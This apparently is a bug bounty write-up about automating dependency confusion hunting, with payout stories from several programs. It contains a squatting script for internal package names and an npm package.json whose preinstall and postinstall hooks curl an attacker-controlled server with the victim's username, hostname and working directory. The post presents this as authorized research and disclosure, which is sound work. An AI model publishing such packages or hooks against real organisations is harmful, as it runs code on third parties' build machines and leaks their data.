Skip to main content

Command Palette

Search for a command to run...

Turning Dependency Confusion Research into a Profitable Stack

Updated
10 min read
Turning Dependency Confusion Research into a Profitable Stack

The easiest way to get started is to find some promising research by someone else, build on it by mixing in other techniques, then apply your new approach to some live targets to see if anything interesting happens” — James Kettle, Director of Research at PortSwigger.

This philosophy was the blueprint for my deep dive into Dependency Confusion vulnerabilities. Starting with zero prior knowledge, I didn’t invent a new attack; I operationalized a known one. This article details my journey from foundational learning to building a custom automation framework for this bug class. I will disclose how I leveraged tooling to systematically exploit targets where manual testing was prohibitive, ultimately leading to multiple successful reports and earnings exceeding five figures.

The Beginning

When I started learning about Dependency Confusion, I researched all available resources. While I found a wealth of information, most blogs and tools felt incomplete. They often provided a single approach or a static snapshot of the vulnerability that was hard to scale or fully operationalize. I felt like I was always missing the crucial piece that allowed for mass success.

That changed when I found the seminal works that truly connected the dots for me:

I began linking everything I had read to build the big picture. Instead of focusing on a single, manual approach, I began figuring out how to apply those techniques at a massive, industrial scale. This led directly to developing a custom tool, my personal attempt to prove James Kettle’s philosophy: to automate what others had only published.

What is Dependency Confusion and How it Works

Dependency Confusion is a software supply chain attack that exploits the way package managers (like npm, pip, or gem) resolve names for dependencies.

The Mechanism

Package managers typically check two locations when installing dependencies: a Private, Internal Registry and a Public Registry. The “confusion” happens when the package manager is configured to check the public registry first or concurrently and prioritizes the highest version number it finds, regardless of the source.

  1. Recon: The attacker scans public code (e.g., GitHub, JS files) and finds a private, internal package name (e.g., acme-analytics).

  2. Injection: The attacker registers a malicious package named acme-analytics on the public registry (e.g., npm) and assigns it a higher version number (e.g., 99.9.9) than the internal package (e.g., 1.0.0).

  3. Installation: When a developer runs their build command, the package manager downloads the public 99.9.9 package instead of the legitimate internal one. The system is confused about which package is the "correct" one.

Where to Find the Clues

The key to finding these vulnerabilities is locating the names of the private packages by scanning for package names that are used in configuration files but are not available on public package registries.

  • Source Code (e.g., GitHub): Scanning for files like package.json, setup.py, or Gemfile.

  • JS Files: In-browser JavaScript bundles often expose the names of internal components.

  • Ecosystems: The vulnerability applies to any ecosystem with a split public/private registry, including npm (Node.js), pip (Python), RubyGems (Ruby), and more.

Building the Custom Automation Engine

As someone who doesn’t enjoy writing extensive boilerplate, my first strategic decision was to leverage an augmented coding tool. I used Augmentcode, which proved instrumental in translating my high-level idea from theory into a functional tool with high-quality code.

Leveraging HAR Files

My automation needed to be smarter than simply grepping GitHub. My inspiration for tackling package name extraction from live websites came directly from the Lupin blog on the Netflix vulnerability, which highlighted the power of HAR files.

A HAR file is a JSON log that captures every HTTP interaction during a web session. The technique involves a sophisticated Reconnaissance Pipeline:

  1. Generate HAR Files: Use a headless browser (like Playwright) to capture all network traffic when loading a target domain.

  2. Advanced Parsing: Instead of relying on fragile regex, the collected JavaScript is fed into a proper Abstract Syntax Tree (AST) parser. This is crucial because AST parsing understands code structure, allowing it to catch dynamic imports and obfuscated variables that simple text scraping misses.

  3. Extract and Cross-Reference: The parser emits a clean list of candidate package identifiers, which are then cross-referenced against public package registries to find unclaimed names or those with lower internal versions.

By chaining these steps, I converted the “ocean of network noise” into a clean shortlist of high-confidence leads.

From Simple Theory to Full-Stack Automation

My initial theory — a simple GitHub script — quickly exploded into a full-stack Dependency Confusion tooling suite named depconf.

Input/Target Key Feature

  • GitHub Orgs: Targeted deep-scan of repository files (e.g., package.json, requirements.txt).

  • Websites/Domains: Fast scanning of domains and subdomains for exposed package names in compiled JavaScript (JS) files.

  • Local Files: Ability to analyze local code dumps (e.g., massive .js files).

  • Multi-Ecosystem Support: Built-in logic to handle the nuances of npm, pip, gem, and other package managers.

The inspiration for this comprehensive, integrated framework was Lupin’s original depi tool. I realized that for maximum profit and efficiency, I couldn't rely on fragmented scripts; I needed an integrated engine.

Fueling the Machine

Building the tool was just the first phase; the next was turning it into a 24/7 automated money-finding engine. To truly scale and apply Kettle’s philosophy, I needed to automate the target acquisition and continuous scanning.

Become a Member

I adopted a “set-it-and-forget-it” approach:

  • The Engine Room: I purchased a powerful VPS to serve as the dedicated, 24/7 host for my automation suite.

  • Continuous Target Acquisition: I used screen to manage multiple simultaneous terminal sessions, each dedicated to a different set of targets.

  • The Target Stream: To constantly fuel the machine, I utilized the bbscope tool to fetch all domains and subdomains from my bug bounty programs. After collecting the initial domains, I performed deep subdomain enumeration to maximize the potential attack surface.

The VPS ran my tool, depconf, in a relentless loop across all collected domains. The core command I ran in each screen instance was:

# This command is placed inside a continuous loop
python3 -m depconf --config depconf_config.yaml --enable-notifications har domains.txt

This command instructed the tool to process targets, perform the Dependency Confusion scan, and, crucially, if a potential vulnerability was found, the --enable-notifications flag would trigger a detailed alert directly to a dedicated Discord channel. This alert included the vulnerable subdomain and the specific JS file where the private package name was discovered.

The Human-in-the-Loop

While the machine handled the reconnaissance and initial discovery, the final, high-value step remained manual:

  • Manual Verification: I would manually review the JS file shared via the Discord notification.

  • PoC Development: If confirmed, I would quickly write a Proof of Concept payload.

  • Publication: I would publish the malicious package to the corresponding public registry (e.g., npm) to verify the Dependency Confusion attack.

  • The Callback: Waiting for the callback confirmed the vulnerability, at which point I immediately drafted the report.

PoC and Success Stories

The most common questions I get are: How do you publish packages on npm without deletion? How do you get the callbacks? How do you manage to find if the callbacks belong to a customer or not?

This relies on a two-stage publishing strategy and meticulous callback management.

The Benign Placeholder

The critical first step is to publish a benign package as a placeholder immediately upon discovery of an unpublished internal name. This prevents other attackers or researchers from claiming the name first.

Here is the simple script that performs this automated initial publication:

PACKAGE_NAME="[REDACTED_PACKAGE_NAME]" && \
mkdir "$PACKAGE_NAME" && \
cat <<EOF > "$PACKAGE_NAME/package.json"
{
  "name": "$PACKAGE_NAME",
  "version": "1.0.0",
  "description": "A simple, benign placeholder for npm.",
  "main": "index.js",
  "scripts": {
    "preinstall": "",
    "postinstall": ""
  },
  "keywords": [],
  "author": "anonymous",
  "license": "ISC"
}
EOF
echo '// This is a benign placeholder for a Node.js package.' > "$PACKAGE_NAME/index.js" && \
cd "$PACKAGE_NAME" && \
npm publish --access public && \
cd ..

This script creates a package with a generic version: 1.0.0 and empty install scripts—it is harmless. I automated this process to publish dozens of placeholders quickly.

The Callback Payload

After a minimum of 24 hours (to ensure the name is reserved), I update the package with the actual PoC payload, significantly incrementing the version number (e.g., to 99.99.1).

The essential change is within the scripts block:

{
  "name": "[REDACTED_PACKAGE_NAME]",
  "version": "99.99.1",
  // ...
  "scripts": {
    "preinstall": "curl -s \"http://[REDACTED_SERVER_URL]/depconf/[PACKAGE_NAME]/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true",
    "postinstall": "curl -s \"http://[REDACTED_SERVER_URL]/depconf/[PACKAGE_NAME]/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true"
  },
  "keywords": [],
  "author": "anonymous",
  "license": "ISC"
}

The payload leverages the preinstall and postinstall hooks. When the victim's package manager installs this version, it executes the curl command, sending a request to my controlled web server. The data captured (username, hostname, current directory) provides irrefutable proof of RCE.

To manage the high volume of potential callbacks, I used a real-time NGINX log filter piped into Project Discovery’s notify tool:

sudo tail -F /var/log/nginx/access.log | grep --line-buffered '/depconf/' | notify -p discord -silent

This sends the filtered log line, containing the full callback data, directly to my dedicated Discord channel for immediate triage.

The most crucial step is validating that the callback is not a false positive from an automated security scanner. This is done by analyzing the source IP address of the callback.

I use the ARI lookup service to check the IP address: https://search.arin.net/rdap/?query=[IP_ADDRESS].

  • Ignore: If the IP belongs to Google Cloud, AWS, or a known public scanner, it is ignored.

  • High Confidence: If the IP belongs to the target company’s dedicated ASN or a commercial ISP in their geographic location, it is a high-confidence hit, indicating a developer’s machine or a build server has installed the malicious package.

This final verification step turns a simple server log into a validated, high-value bug bounty report.

Some Success Stories

Elementor Bug Bounty Program

My depconf tool's GitHub reconnaissance module was fully operational when I targeted the Elementor bug bounty program on Bugcrowd. I fed depconf all GitHub organizations associated with the program. The tool rapidly scanned their repositories, identifying a crucial package name used internally but completely unregistered on npm. Following my two-stage PoC strategy, I immediately claimed the name and then published the callback payload. Within a short period, I received a legitimate callback from an internal Elementor server, confirming a P1-impact Dependency Confusion vulnerability.

Private Bug Bounty Program at HackerOne

On a private bug bounty program at HackerOne, my depconf tool, using its HAR scanning capabilities, identified a critical internal package name exposed in their JavaScript files. I initiated my two-stage PoC, but made a crucial mistake: I reported the finding prematurely, before receiving a confirmed callback from the target. The report was initially closed as Informative. Three days later, the genuine callback arrived. Thanks to triager “Kirk,” the report was reopened, the vulnerability was confirmed by the customer, and a payout followed within a week.

Swiss Bug Bounty Program

My automated depconf engine proved its versatility and profitability across a single, high-value Swiss bug bounty program, yielding three separate reports (two Critical, one High). But the most exhilarating discovery, and a highlight of my research, came from an Android application.

While scanning the program, my tool’s capability to analyze assets within Android APK files flagged a critical finding. I unpacked the APK, performed static analysis on its bundled JavaScript using depconf, and swiftly identified an unscoped internal package. A public registry check confirmed it was entirely unclaimed. I executed my standard two-stage PoC, publishing the high-version payload. Within minutes, callbacks flooded in, confirming Remote Code Execution inside multiple build environments. This RCE was classified as Critical, demonstrating potential for credential theft and source code exfiltration.

This experience unequivocally validated the effectiveness of automated research methodologies on diverse target types, including mobile applications, and capped off a highly successful run on that program.

Key Takeaways for Your Hacking Journey

  • Iterate, Don’t Invent: Focus your energy on automating and refining existing, published research.

  • Infrastructure is King: A reliable 24/7 VPS and automated target feeding (bbscope) is what converts a small script into a discovery machine.

  • The Placeholder Strategy is Essential: Always reserve the package name immediately to protect your finding from other researchers.

  • Validate Your Callbacks: The ARIN lookup is the final, crucial step that distinguishes noise from a reportable, high-value vulnerability.

My Journey: Beyond the Code

So, if there’s one thing I hope you take away from this, it’s this: Don’t wait for a flash of genius. Look at the brilliant work already out there. Ask yourself, “Can I automate this? Can I scale this?” The answers might just surprise you, and they might just lead you to your own five-figure success story.

Happy hunting, and FREE PALESTINE!🇵🇸